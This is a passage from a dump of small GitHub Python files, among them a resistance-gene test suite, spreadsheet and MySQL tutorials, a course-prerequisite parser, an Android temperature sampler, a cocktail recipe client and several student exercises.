os.path.join(working_directory,outputs,\"{}.json\".format(filename))\n\trun_rgi(rgi, 'contig', os.path.join(working_directory,inputs,filename), output_file)\n\n\tassert validate_results(output_file, 100, 'NDM-1', 'Perfect') == True\n\ndef test_rgi_variant_model(rgi):\n\n\tfilename = \"variant.fasta\"\n\toutput_file = os.path.join(working_directory,outputs,\"{}.json\".format(filename))\n\trun_rgi(rgi, 'protein', os.path.join(working_directory,inputs,filename), output_file)\n\n\tassert validate_results(output_file, 99.88, 'Escherichia coli gyrB conferring resistance to aminocoumarin', 'Strict') == True\n\ndef test_rgi_overexpression_model(rgi):\n\n\tfilename = \"overexpression.fasta\"\n\toutput_file = os.path.join(working_directory,outputs,\"{}.json\".format(filename))\n\trun_rgi(rgi, 'protein', os.path.join(working_directory,inputs,filename), output_file)\n\n\tassert validate_results(output_file, 100, 'nalC', 'Strict') == True\n\tassert validate_results(output_file, 99.53, 'nalC', 'Strict') == True\n\ndef test_rgi_effluxpump_model(rgi):\n\n\tfilename = \"effluxpump.fasta\"\n\toutput_file = os.path.join(working_directory,outputs,\"{}.json\".format(filename))\n\trun_rgi(rgi, 'protein', os.path.join(working_directory,inputs,filename), output_file)\n\n\tassert validate_results(output_file, 100, 'MexA', 'Perfect') == True\n\tassert validate_results(output_file, 100, 'MexB', 'Perfect') == True\n\tassert validate_results(output_file, 100, 'OprM', 'Perfect') == True\n\tassert validate_results(output_file, 100, 'Pseudomonas aeruginosa CpxR', 'Perfect') == True\n\tassert validate_results(output_file, 99.82, 'MexB', 'Strict') == True\n\tassert validate_results(output_file, 99.59, 'OprM', 'Strict') == True\n\tassert validate_results(output_file, 98.12, 'nalC', 'Strict') == True\n\tassert validate_results(output_file, 97.28, 'MexR', 'Strict') == True\n\tassert validate_results(output_file, 89.12, 'MexR', 'Loose') == True\n\ndef test_rgi_rrna_model(rgi):\n\n\tfilename = \"rrna.fasta\"\n\toutput_file = os.path.join(working_directory,outputs,\"{}.json\".format(filename))\n\trun_rgi(rgi, 'contig', os.path.join(working_directory,inputs,filename), output_file)\n\n\tassert validate_results(output_file, 99.97, \\\n\t\t'Streptococcus pneumoniae 23S rRNA mutation conferring resistance to macrolides and streptogramins antibiotics', 'Strict') == True\n\n\ndef test_rgi_nudge_loose_to_strict(rgi):\n\n\tfilename = \"loose_to_strict.fasta\"\n\toutput_file = os.path.join(working_directory,outputs,\"{}.json\".format(filename))\n\trun_rgi(rgi, 'contig', os.path.join(working_directory,inputs,filename), output_file)\n\n\tassert validate_results(output_file, 98.06, 'Escherichia coli EF-Tu mutants conferring resistance to Pulvomycin', 'Strict') == True\n","repo_name":"arpcard/rgi","sub_path":"tests/test_1.py","file_name":"test_1.py","file_ext":"py","file_size_in_byte":5858,"program_lang":"python","lang":"en","doc_type":"code","stars":274,"dataset":"github-code","pt":"32"} +{"seq_id":"9947954250","text":"from collections import Counter\ntestCases = int(input())\n\n\nfor i in range(testCases):\n n, cost = input().split()\n orbit = input().split()\n count = Counter(orbit)\n expence = 0\n for key, values in count.items():\n if values < int(cost):\n expence += values\n else:\n expence += int(cost)\n print(expence)\n","repo_name":"Gizaw-Agodo/A2sV","sub_path":"community-leetcode/cf-planets.py","file_name":"cf-planets.py","file_ext":"py","file_size_in_byte":352,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"32"} +{"seq_id":"26095550807","text":"# 引入对Excel表格文件操作的库,openpyxl模块的官方文档:https://openpyxl.readthedocs.io/en/stable/\nimport openpyxl\n# 利用openpyxl.Workbook()创建新的workbook对象,即新的空的Excel文件\nwb = openpyxl.Workbook()\n# 获取新建空的workbook的活动表\nsheet = wb.active\n# 对工作表-worksheet进行重命名\nsheet.title = '测试'\n# 操作单元格,往单元格里写入内容\n# 往第一个工作表的A1单元格,写入漫威宇宙\nsheet['A1'] = '漫威宇宙'\n# 往表格中添加一行内容,使用append函数\nrow =['美国队长', '钢铁侠', '蜘蛛侠']\nsheet.append(row)\n# 一次性写入多行内容-先将多行内容写成列表,再放进大列表,赋值给rows\nrows = [['美国队长', '钢铁侠', '蜘蛛侠'], ['是', '漫威', '宇宙', '经典', '人物']]\n# 遍历rows.同时把遍历的内容添加到表格里-实现多行写入\nfor i in rows:\n sheet.append(i)\nprint(rows)\n# 往excel文件中写入数据后,保存Excel文件,杨光-Excel的名字\nwb.save('杨光.xlsx')\n# 读取Excel里的数据\n# 调用openpyxl.load_workbook()函数,打开“杨光.xlsx”文件。\nwb = openpyxl.load_workbook('杨光.xlsx')\n# 获取“杨光.xlsx”工作薄中名为“测试”的工作表。\nsheet = wb['测试']\n# 获取工作薄所有工作表的名字,并打印\nsheetname = wb.sheetnames\nprint(sheetname)\n# 把“测试”工作表中A1单元格赋值给A1_cell,再利用单元格value属性,就能打印出A1单元格的值。\nA1_cell = sheet['A1']\nA1_value = A1_cell.value\nprint(A1_value)","repo_name":"Bryant-New/python-crawler","sub_path":"Excel存储保存数据.py","file_name":"Excel存储保存数据.py","file_ext":"py","file_size_in_byte":1560,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"12245023258","text":"\nfrom course import Course\n\nand_string = \" and \"\nor_string = \" or \"\n\n\ntest_string = \"CS177:MATH2B and STATS67 and ICS6B and ICS6D and (MATH 3A or ICS6N)\"\n\n#test_string = \"ICS51:ICS31 and ICS6B\"\n\ntest_string = \"blah blah aldsf;j\"\n\n\ndef remove_spaces(prerequisite_string):\n '''\n if you find a space and the next word is not \"and\" or \"or\",\n then remove that space except after one of those words\n '''\n space_index = None\n end_index = 0\n start_index = 0\n \n new_string = \"\"\n final_string = \"\"\n \n temp_string = \"\"\n bool_tracker = \"\"\n \n has_and = False\n has_or = False\n \n c = 0\n \n for i in range(len(prerequisite_string)):\n \n if c >= len(prerequisite_string):\n return final_string\n temp_string += prerequisite_string[c]\n bool_tracker += prerequisite_string[c]\n end_index += 1\n \n \n if and_string in bool_tracker:\n has_and = True\n new_string = temp_string[:-len(and_string)]\n new_string = new_string.replace(\" \", \"\")\n new_string = new_string.replace(\" \", \"\")\n if new_string != new_string.upper():\n bool_tracker = \"\"\n temp_string = \"\"\n final_string = final_string[:-len(and_string)]\n break\n new_string += and_string\n final_string += new_string\n #c += len(and_string)\n bool_tracker = \"\"\n temp_string = \"\"\n continue\n \n if or_string in bool_tracker:\n has_or = True\n new_string = temp_string[:-len(or_string)]\n new_string = new_string.replace(\" \", \"\")\n new_string = new_string.replace(\" \", \"\")\n if new_string != new_string.upper():\n bool_tracker = \"\"\n temp_string = \"\"\n final_string = final_string[:-len(or_string)]\n break\n new_string += or_string\n final_string += new_string\n #c += len(or_string)\n bool_tracker = \"\"\n temp_string = \"\"\n continue\n \n c += 1\n \n if (not has_and and not has_or):\n final_string = temp_string.strip().replace(\" \", \"\")\n \n\n if has_and:\n if final_string[-len(and_string):] == and_string:\n return final_string[:-len(and_string)] + \"\\n\"\n if has_or:\n if final_string[-len(or_string):] == or_string:\n return final_string[:-len(or_string)] + \"\\n\"\n \n \n '''\n if final_string[len(final_string) - len(and_string):] == and_string:\n final_string = final_string[:len(final_string) - len(and_string)]\n elif final_string[len(final_string) - len(or_string):] == or_string:\n final_string = final_string[:len(final_string) - len(or_string)]\n '''\n \n \n final_string += \"\\n\"\n return final_string\n\n\ndef remove_character_from_file(filepath_in, filepath_out, character):\n file_in = open(filepath_in, \"r\")\n lines = file_in.read()\n \n file_in.close()\n \n lines = lines.replace(character, \"\")\n \n file_out = open(filepath_out, \"w\")\n file_out.write(lines)\n \n file_out.close()\n \n \n \n \n return lines\n\n\n\n\n\ndef make_course_list_from_file(filename:str):\n course_list = []\n file = open(filename, 'r')\n \n for line in file:\n line = line.replace(\"\\n\", \"\")\n if (contains_course_name(line)):\n course = make_course_from_line(line)\n if not course_already_in_list(course, course_list):\n course_list.append(course)\n \n file.close()\n \n \n return course_list\n\n\n\ndef contains_course_name(course_string:str):\n max_course_name_length = 10\n for i in range(len(course_string)):\n if course_string[i] == \":\":\n return True\n if and_string in course_string:\n return True\n if or_string in course_string:\n return True\n if i > max_course_name_length:\n return False\n \n return False\n\n\n\ndef make_course_from_line(course_string:str):\n course_name = \"\"\n finished_course_name = False\n index = 0\n for char in course_string:\n if not (finished_course_name):\n if char == \":\":\n finished_course_name = True\n index += 1\n break\n else:\n course_name += char\n index += 1\n \n course = Course(course_name.upper())\n \n prerequisite_list = get_prerequisite_list_from_line(course_string[index:])\n \n \n course.addPrerequisites(prerequisite_list)\n \n \n \n \n \n return course\n\n\n\ndef get_index_of_end_of_first_course_name(course_string):\n temp = ''\n for i in range(len(course_string)):\n temp += course_string[i]\n if course_string[i] == \":\":\n return i - 1\n if \")\" in temp:\n i -= 1\n \n return i\n if and_string in temp:\n return i - len(and_string)\n if or_string in temp:\n return i - len(or_string)\n \n return len(course_string) - 1\n \n \n \ndef course_already_in_list(course, course_list):\n for c in course_list:\n if course.name == c.name:\n return True\n \n return False\n\n\ndef get_prerequisite_list_from_line(prerequisite_string):\n start_index = 0\n end_index = 0\n temp_string = \"\"\n prerequisite_list = []\n last_logic = None\n \n disjunction = False\n open_paren_index = 0\n close_paren_index = 0\n in_parens = False\n \n \n \n for i in range(len(prerequisite_string)):\n end_index += 1\n temp_string += prerequisite_string[i]\n \n if(prerequisite_string[i] == \"(\"):\n open_paren_index = i\n in_parens = True\n \n \n \n if and_string in temp_string:\n last_logic = and_string\n \n \n \n slice_to_index = end_index - len(and_string)\n \n while prerequisite_string[start_index] == \"\\\"\":\n start_index += 1\n \n while prerequisite_string[slice_to_index - 1] == \"\\\"\":\n slice_to_index -= 1\n \n while prerequisite_string[start_index] == \",\":\n start_index += 1\n \n while prerequisite_string[slice_to_index - 1] == \",\":\n slice_to_index -= 1\n \n while prerequisite_string[start_index] == \"(\":\n start_index += 1\n \n while prerequisite_string[slice_to_index - 1] == \")\":\n slice_to_index -= 1\n \n \n prerequisite_name = prerequisite_string[start_index:slice_to_index]\n \n \n start_index = end_index\n temp_string = \"\"\n \n prerequisite = Course(prerequisite_name)\n prerequisite_list.append(prerequisite)\n \n \n \n \n elif or_string in temp_string:\n \n last_logic = or_string\n disjunction_list = []\n disjunction = True\n \n slice_to_index = end_index - len(or_string)\n \n while prerequisite_string[slice_to_index - 1] == \"\\\"\":\n slice_to_index -= 1\n \n while prerequisite_string[start_index] == \"\\\"\":\n start_index += 1\n \n while prerequisite_string[slice_to_index - 1] == \",\":\n slice_to_index -= 1\n \n while prerequisite_string[start_index] == \",\":\n start_index += 1\n \n \n while prerequisite_string[slice_to_index - 1] == \")\":\n slice_to_index -= 1\n \n while prerequisite_string[start_index] == \"(\":\n start_index += 1\n \n prerequisite_name = prerequisite_string[start_index:slice_to_index]\n \n \n prerequisite = Course(prerequisite_name)\n \n start_index = end_index\n \n while prerequisite_string[start_index] == \"(\":\n start_index += 1\n \n if not course_already_in_list(prerequisite, disjunction_list):\n disjunction_list.append(prerequisite)\n \n \n after_string = prerequisite_string[start_index:]\n after_name_index = get_index_of_end_of_first_course_name(after_string) + 1\n \n while after_string[after_name_index - 1] == \")\":\n after_name_index -= 1\n \n second_prerequisite_name = after_string[:after_name_index]\n second_prerequisite = Course(second_prerequisite_name)\n \n \n if not course_already_in_list(second_prerequisite, disjunction_list):\n disjunction_list.append(second_prerequisite)\n \n \n \n temp_string = \"\"\n \n \n prerequisite_list.append(disjunction_list)\n \n \n \n if i == len(prerequisite_string) - 1:\n prerequisite_name = prerequisite_string[start_index:]\n prerequisite = Course(prerequisite_name)\n if last_logic == and_string or last_logic == None:\n if len(prerequisite_name.strip()) > 0:\n prerequisite_list.append(prerequisite)\n \n \n return prerequisite_list\n\n\n\n \n \n \ndef get_majors_list_from_file(filepath):\n majors_list = []\n file = open(filepath, 'r')\n \n for line in file:\n majors_list.append(line.rstrip('\\n'))\n \n \n file.close()\n \n return majors_list\n\n\n\ndef get_string_from_file(filepath):\n string = \"\"\n file = open(filepath, 'r')\n \n for line in file:\n string += line\n \n return string\n \n\n\nif __name__ == \"__main__\":\n filename = \"testPrerequisites.txt\"\n path = \"majors/\"\n course_list = make_course_list_from_file(path + filename)\n \n\n\n\n\n\n\n\n \n\n\n\n","repo_name":"jlittle1223/Course-Dependency-Graph","sub_path":"graph_creation/file_util.py","file_name":"file_util.py","file_ext":"py","file_size_in_byte":10240,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"1704312064","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Nov 29 21:56:28 2017\n\n@author: ASUS\n\"\"\"\n\n#python.exe \"C:\\Users\\ASUS\\Documents\\Python Scripts\\onlab2\\dash_search.py\"\n\nimport dash\nfrom dash.dependencies import Input, Output, State\nimport dash_core_components as dcc\nimport dash_html_components as html\nfrom social_media_search import *\nimport pandas as pd\n\napp = dash.Dash()\n\napp.layout = html.Div([\n dcc.Input(id='input-1-state', type=\"text\", value='ferencvaros'),\n html.Button(id='submit-button', n_clicks=0, children='Submit'),\n html.Div(id='output-state')\n])\n\n\n@app.callback(Output('output-state', 'children'),\n [Input('submit-button', 'n_clicks')],\n [State('input-1-state', 'value')])\ndef update_output(n_clicks, team):\n# return u'''\n# Input 1 is \"{}\"\n# '''.format(str(social_media_search(team)['facebook_name']))\n search = social_media_search(team)\n return html.Div([\n html.H3(search['facebook_name']),\n html.H3(search['facebook_likes'])\n ])\n\n\nif __name__ == '__main__':\n app.run_server(debug=True, host='127.0.0.1', port=801)\n \n \n\n\n\n\n#print(social_media_search(team))\n\n#for key, value in social_media_search(team).items():\n# print (key, \":\", value)","repo_name":"gaborlaszlokun/onlab2","sub_path":"dash_search.py","file_name":"dash_search.py","file_ext":"py","file_size_in_byte":1231,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"4608164276","text":"import logging\nfrom typing import List\nfrom ppadb.client import Client\nfrom ppadb.device import Device\n\nlog = logging.getLogger(__name__)\n\n\nclass DefaultCpuTempSampler:\n TEMP_FILE_PATHS = [\n \"/sys/devices/system/cpu/cpu0/cpufreq/cpu_temp\",\n \"/sys/devices/system/cpu/cpu0/cpufreq/FakeShmoo_cpu_temp\",\n \"/sys/class/thermal/thermal_zone0/temp\",\n \"/sys/class/i2c-adapter/i2c-4/4-004c/temperature\",\n \"/sys/devices/platform/tegra-i2c.3/i2c-4/4-004c/temperature\",\n \"/sys/devices/platform/omap/omap_temp_sensor.0/temperature\",\n \"/sys/devices/platform/tegra_tmon/temp1_input\",\n \"/sys/kernel/debug/tegra_thermal/temp_tj\",\n \"/sys/devices/platform/s5p-tmu/temperature\",\n \"/sys/class/thermal/thermal_zone1/temp\",\n \"/sys/class/hwmon/hwmon0/device/temp1_input\",\n \"/sys/devices/virtual/thermal/thermal_zone1/temp\",\n \"/sys/devices/virtual/thermal/thermal_zone0/temp\",\n \"/sys/class/thermal/thermal_zone3/temp\",\n \"/sys/class/thermal/thermal_zone4/temp\",\n \"/sys/class/hwmon/hwmonX/temp1_input\",\n \"/sys/devices/platform/s5p-tmu/curr_temp\",\n ]\n\n def __init__(self, device: Device) -> None:\n self.device = device\n self.cpu_temp_valid_path = None\n\n def cpu_temp(self):\n if not self.cpu_temp_valid_path:\n for path in self.TEMP_FILE_PATHS:\n temp = self.__try_get_temp(path)\n if temp is None:\n continue\n else:\n return temp\n else:\n return self.__try_get_temp(self.cpu_temp_valid_path)\n\n def __try_get_temp(self, path):\n try:\n print(f\"读取 {path}\")\n result = self.device.shell(f\"cat {path}\")\n temp = float(result)\n print(f\"{temp} valid {self.is_temp_valid(temp)}\")\n print(f\"{temp/1000} valid {self.is_temp_valid(temp/1000)}\")\n if self.is_temp_valid(temp):\n self.cpu_temp_valid_path = path\n return temp\n elif self.is_temp_valid(temp / 1000):\n self.cpu_temp_valid_path = path\n return temp / 1000\n except Exception as e:\n print(e)\n return None\n\n def is_temp_valid(self, value):\n return -30 <= value <= 250\n\n\nclass MarkTempSampler:\n CPU_MARKS = [\n \"mtktscpu\", # 联发科\n \"tsens_tz_sensor\", # 高通\n \"exynos\", # 三星\n \"sdm-therm\", # 高通晓龙\n \"cpu-0-0-us\", # 通用\n \"soc_thermal\", # 通用\n \"cpu\", # 通用\n ]\n BATTERY_MARKS = [\"battery\", \"Battery\"]\n NPU_MARKS = [\"npu-usr\", \"npu\"]\n GPU_MARKS = [\"gpuss-0-us\", \"gpu\"]\n\n SENSOR_LIST_CMD = \"cat /sys/devices/virtual/thermal/thermal_zone*/type\"\n SENSOR_FILE_LIST_CMD = \"cd /sys/devices/virtual/thermal/ && ls|grep thermal_zone\"\n SENSOR_TEMP_LIST_CMD = \"cat /sys/devices/virtual/thermal/thermal_zone*/temp\"\n TEMP_CMD = \"cat /sys/devices/virtual/thermal/{filename}/temp\"\n\n def __init__(self, device: Device) -> None:\n self.device = device\n self._sensor_list = self.get_sensor_list()\n self._sensor_filename_list = self.get_sensor_filename_list()\n self.prop = self.device.get_properties()\n\n def get_sensor_list(self):\n list_str: str = self.device.shell(self.SENSOR_LIST_CMD)\n return list_str.split(\"\\n\")\n\n def get_sensor_filename_list(self):\n list_str: str = self.device.shell(self.SENSOR_FILE_LIST_CMD)\n return list_str.split(\"\\n\")\n\n def get_sensor_temp(self, index: int):\n file_name = self._sensor_filename_list[index]\n temp_value = self.device.shell(self.TEMP_CMD.format(filename=file_name)) or \"0\"\n temp_value = self.str_to_temp(temp_value)\n\n return temp_value\n\n def get_senser_index(self, marks):\n sensor_list: List[str] = self._sensor_list\n for mark in marks:\n for index, sensor_name in enumerate(sensor_list):\n if sensor_name.lower().startswith(mark):\n return index\n\n manufacturer = self.prop[\"ro.product.manufacturer\"] # 制造商\n model = self.prop[\"ro.product.model\"] # 型号\n log.warning(f\"{manufacturer}-{model} 没有匹配到{marks} 无法获得其温度,改用整体温度表示\")\n return 0\n\n def is_temp_valid(self, value):\n return -30 <= value <= 250\n\n def get_temp(self):\n total_temp_index = 0\n cpu_temp_index = self.get_senser_index(self.CPU_MARKS)\n gpu_temp_index = self.get_senser_index(self.GPU_MARKS)\n npu_temp_index = self.get_senser_index(self.NPU_MARKS)\n battery_temp_index = self.get_senser_index(self.BATTERY_MARKS)\n\n total_temp = (\n self.get_sensor_temp(total_temp_index)\n if total_temp_index is not None\n else 0\n )\n cpu_temp = (\n self.get_sensor_temp(cpu_temp_index) if cpu_temp_index is not None else 0\n )\n gpu_temp = (\n self.get_sensor_temp(gpu_temp_index) if gpu_temp_index is not None else 0\n )\n npu_temp = (\n self.get_sensor_temp(npu_temp_index) if npu_temp_index is not None else 0\n )\n battery_temp = (\n self.get_sensor_temp(battery_temp_index)\n if battery_temp_index is not None\n else 0\n )\n\n return {\n \"total\": total_temp,\n \"cpu\": cpu_temp,\n \"gpu\": gpu_temp,\n \"npu\": npu_temp,\n \"battery\": battery_temp,\n }\n\n def str_to_temp(self, txt: str):\n try:\n temp = float(txt)\n if self.is_temp_valid(temp):\n return temp\n elif self.is_temp_valid(temp / 10):\n return temp / 10\n elif self.is_temp_valid(temp / 1000):\n return temp / 1000\n return 0\n except Exception:\n return -1\n\n\nif __name__ == \"__main__\":\n from ppadb.client import Client\n\n adb = Client()\n dev = adb.devices()[0]\n\n util = MarkTempSampler(dev)\n print(util.get_senser_index(util.CPU_MARKS))\n print(\"all\", util.get_temp())\n","repo_name":"kaluluosi/PerformanceCatcher","sub_path":"src/perfcat/modules/profiler/temp.py","file_name":"temp.py","file_ext":"py","file_size_in_byte":6186,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"36794961338","text":"def game(score=0):\n highscore=None\n if highscore==None:\n highscore=0\n if highscore<=score:\n highscore=score\n return highscore\n else:\n return highscore\n\ntotalscore=game()\nprint(totalscore)\n\ntotalscore=game(55)\nprint(totalscore)","repo_name":"KrushnaPatare/Python-Learning","sub_path":"Chapter_09@File_Input_Output/pr_02.py","file_name":"pr_02.py","file_ext":"py","file_size_in_byte":266,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"14977769958","text":"\"\"\"\nUser interface for cocktails\n\nWhen run as a script, this module prompts the user for two currencies and amount.\nIt prints out the result of converting the first currency to the second.\n\nAuthor: Michael Colman\nDate: May 1, 2020\n\"\"\"\n\ndrink = str(input('Name a drink: '))\n\nimport ingredients\n\njson = ingredients.service_response(drink)\ninstructions = ingredients.get_strInstructions(json)\nofficial_drink = ingredients.get_strDrink(json)\n\n#ingredients\ningredient1 = ingredients.get_strIngredient1(json)\ningredient2 = ingredients.get_strIngredient2(json)\ningredient3 = ingredients.get_strIngredient3(json)\ningredient4 = ingredients.get_strIngredient4(json)\ningredient5 = ingredients.get_strIngredient5(json)\ningredient6 = ingredients.get_strIngredient6(json)\ningredient7 = ingredients.get_strIngredient7(json)\ningredient8 = ingredients.get_strIngredient8(json)\ningredient9 = ingredients.get_strIngredient9(json)\ningredient10 = ingredients.get_strIngredient10(json)\ningredient11 = ingredients.get_strIngredient11(json)\ningredient12 = ingredients.get_strIngredient12(json)\ningredient13 = ingredients.get_strIngredient13(json)\ningredient14 = ingredients.get_strIngredient14(json)\ningredient15 = ingredients.get_strIngredient15(json)\n\n#measurements\n\nmeasurement1 = ingredients.get_strMeasure1(json)\nmeasurement2 = ingredients.get_strMeasure2(json)\nmeasurement3 = ingredients.get_strMeasure3(json)\nmeasurement4 = ingredients.get_strMeasure4(json)\nmeasurement5 = ingredients.get_strMeasure5(json)\nmeasurement6 = ingredients.get_strMeasure6(json)\nmeasurement7 = ingredients.get_strMeasure7(json)\nmeasurement8 = ingredients.get_strMeasure8(json)\nmeasurement9 = ingredients.get_strMeasure9(json)\nmeasurement10 = ingredients.get_strMeasure10(json)\nmeasurement11 = ingredients.get_strMeasure11(json)\nmeasurement12 = ingredients.get_strMeasure12(json)\nmeasurement13 = ingredients.get_strMeasure13(json)\nmeasurement14 = ingredients.get_strMeasure14(json)\nmeasurement15 = ingredients.get_strMeasure15(json)\n\n\n\n\n#Print Statements\n\nprint('\\nHere is how to make a '+str(official_drink)+'.\\n')\nprint('Instructions:\\n\\n'+str(instructions)+'\\n')\nprint('Ingredients:\\n')\nprint(str(ingredient1)+' '+str(measurement1))\nprint(str(ingredient2)+' '+str(measurement2))\nprint(str(ingredient3)+' '+str(measurement3))\nprint(str(ingredient4)+' '+str(measurement4))\nprint(str(ingredient5)+' '+str(measurement5))\nprint(str(ingredient6)+' '+str(measurement6))\nprint(str(ingredient7)+' '+str(measurement7))\nprint(str(ingredient8)+' '+str(measurement8))\nprint(str(ingredient9)+' '+str(measurement9))\nprint(str(ingredient10)+' '+str(measurement10))\nprint(str(ingredient11)+' '+str(measurement11))\nprint(str(ingredient12)+' '+str(measurement12))\nprint(str(ingredient13)+' '+str(measurement13))\nprint(str(ingredient14)+' '+str(measurement14))\nprint(str(ingredient15)+' '+str(measurement15))\n","repo_name":"mikecolman/cocktails","sub_path":"getcocktail.py","file_name":"getcocktail.py","file_ext":"py","file_size_in_byte":2853,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"21250161495","text":"import pymysql\ndb = pymysql.connect(host=\"localhost\",port=3306,user='study',password='study', db='study',charset='utf8')\n\ncursor = db.cursor()\n\nsql = \"\"\"\nCREATE TABLE python(\n name varchar(20) NOT NULL,\n match int null,\n science int null,\n PRIMARY KEY (name)\n)\n\"\"\"\ncursor.execute(sql)\ndb.commit()\n\nsql = \"\"\"\nINSERT INTO python(\nVALUES('홍길동',20,50)\nVALUES('임꺽정',30,40)\n)\n\"\"\"\ncursor.execute(sql)\ndb.commit()\n\nsql = \"\"\"\nDELETE FROM python\nWHERE name = '홍길동'\n\"\"\"\ncursor.execute(sql)\ndb.commit()\n\nsql = \"\"\"\nSELECT *\nFROM python\n\"\"\"\ncursor.execute(sql)\nrs = cursor.fetchall()\nprint(rs)\n\ncursor.close()\ndb.close()\n","repo_name":"taeukkk/webCrawling","sub_path":"database/pymysql_example.py","file_name":"pymysql_example.py","file_ext":"py","file_size_in_byte":637,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"36897579452","text":"def RMS(x, y):\n \"\"\" среднеквадратическая ошибка\"\"\"\n # если на вход даны массивы разной длины\n if len(x) != len(y):\n # ошибка\n return 0\n s = 0.\n for i in xrange(len(x)):\n s += (x[i] - y[i]) ** 2\n return (s/len(x)) ** 0.5\n","repo_name":"toly/quotes","sub_path":"quotes/stat.py","file_name":"stat.py","file_ext":"py","file_size_in_byte":323,"program_lang":"python","lang":"ru","doc_type":"code","stars":4,"dataset":"github-code","pt":"32"} +{"seq_id":"10098336093","text":"import diplib\nfrom diplib import PyDIPjavaio\n\nfrom util.common_util import CommonUtil\nfrom util.image_util import ImageUtil\nfrom util.plot_util import PlotUtil\nimport numpy as np\n\nif __name__ == '__main__':\n\n # Configure files and directories\n input_dir: str = CommonUtil.obtain_project_default_input_dir_path() + 'asm6/'\n proj_output_dir_path: str = CommonUtil.obtain_project_default_output_dir_path() + CommonUtil.generate_date_time_str() + \"/\"\n\n image_width: int = 512\n image_height: int = 512\n image_layers: int = 8\n\n # image_name_list: list = [\"convollaria_512_10X_sameTracks_green.ics\"]\n # image_name_list: list = [\"convollaria_512_10X_sameTracks_green_red.ics\"]\n image_name_list: list = [\"convollaria_512_10X_twoTracks_green_red.ics\"]\n\n gray_value_in_each_layer: list = [255, 240, 225, 210, 195, 180, 165, 150, 135, 120, 105, 90, 75, 60, 45, 30]\n\n pixel_for_each_color: int = image_width * image_height * image_layers; print(\"pixel_for_each_color\", pixel_for_each_color)\n for image_name in image_name_list:\n curr_img: PyDIPjavaio.ImageRead = ImageUtil.obtain_diplib_image(image_name, input_dir); ImageUtil.show_image_in_dip_view(curr_img, title=\"original\")\n\n threshold_value = ImageUtil.derive_threshold_value(curr_img)\n threshold_img = ImageUtil.filter_image_by_threshold_value(curr_img, threshold_value); ImageUtil.show_image_in_dip_view(threshold_img, title=\"threshold\")\n\n pixel_flattened_list: list = ImageUtil.obtain_pixel_value_list(threshold_img); print(\"pixel_flattened_list\", len(pixel_flattened_list))\n green_pixel_flattened_list = pixel_flattened_list[: pixel_for_each_color]; print(len(green_pixel_flattened_list))\n pixel_binary_3d = np.reshape(green_pixel_flattened_list, (image_layers, image_width, image_height)); #ImageUtil.show_image_in_dip_view(pixel_binary_3d, title=\"pixel_3d\")\n\n pixel_grayscale_2d = np.zeros((image_width, image_height))\n for layer_idx in range(0, image_layers):\n for width_idx in range(image_width):\n for height_idx in range(image_height):\n pixel_value = pixel_binary_3d[layer_idx][width_idx][height_idx]\n\n has_no_foreground_pixel = (pixel_grayscale_2d[width_idx][height_idx] == 0)\n if pixel_value == 1 and has_no_foreground_pixel:\n pixel_grayscale_2d[width_idx][height_idx] = gray_value_in_each_layer[layer_idx]\n\n\n ImageUtil.show_image_in_dip_view(pixel_grayscale_2d, title=\"depth cueing\")\n\n # file_name: str = \"q11_depth_cueing_sameTracks_green.png\"\n # file_name: str = \"q11_depth_cueing_sameTracks_green_red.png\"\n file_name: str = \"q11_depth_cueing_twoTracks_green_red.png\"\n CommonUtil.save_ndarray_as_image(pixel_grayscale_2d, proj_output_dir_path, file_name)\n\n CommonUtil.press_enter_to_exit()","repo_name":"wilsonwcyiu/210418_iaim_group_asm","sub_path":"all_asm/asm6/q11_depth_cueing.py","file_name":"q11_depth_cueing.py","file_ext":"py","file_size_in_byte":2938,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"41153016883","text":"'''\r\nWAP in python to create a stack Student with details of student name and their marks.\r\nWrite Push Pop and Traversal operation using menu.\r\n'''\r\nStudent = []\r\ndef Push(Student):\r\n name = input(\"Enter Student's Name : \")\r\n marks = eval(input(\"Enter Marks : \"))\r\n st = [name,marks]\r\n Student.append(st)\r\ndef Pop(Student):\r\n if len(Student) == 0:\r\n print(\"Underflow\")\r\n else:\r\n p = Student.pop()\r\n print(p)\r\ndef Traversal(Student):\r\n if len(Student) == 0:\r\n print(\"First put some info to the stack then only you'll be able to see the records :)\")\r\n else:\r\n for ch in Student:\r\n print(ch)\r\nwhile True:\r\n print(\"Press 1 - to Push a Record\")\r\n print(\"Press 2 - to Pop a Record\")\r\n print(\"Press 3 - to See All the Records\")\r\n print(\"Press 4 - to Exit\")\r\n a = int(input(\"Enter your choice : \"))\r\n if a == 1:\r\n Push(Student)\r\n elif a == 2:\r\n Pop(Student)\r\n elif a == 3:\r\n Traversal(Student)\r\n elif a == 4:\r\n print(\"Program Finished\")\r\n break\r\n else:\r\n print(\"You had only 4 options to choose -__-\")\r\n","repo_name":"prachibarnwal/Basics-in-Python","sub_path":"186.) to store stu name and their marks in stack.py","file_name":"186.) to store stu name and their marks in stack.py","file_ext":"py","file_size_in_byte":1137,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"29958643577","text":"\nfrom datetime import timedelta\nimport datetime\ndef week_after(d):\n date = d.split(\"/\")\n year = int(date[2])\n month = int(date[1])\n day = int(date[0])\n x = datetime.datetime(year, month, day)\n one_week = x + timedelta(days = 7)\n return one_week.strftime(\"%d\"+\"/\"\"%m\"+\"/\"\"%Y\")\n\n","repo_name":"daniel-reich/ubiquitous-fiesta","sub_path":"S4uZaKhcDa7pJ33nu_5.py","file_name":"S4uZaKhcDa7pJ33nu_5.py","file_ext":"py","file_size_in_byte":284,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} 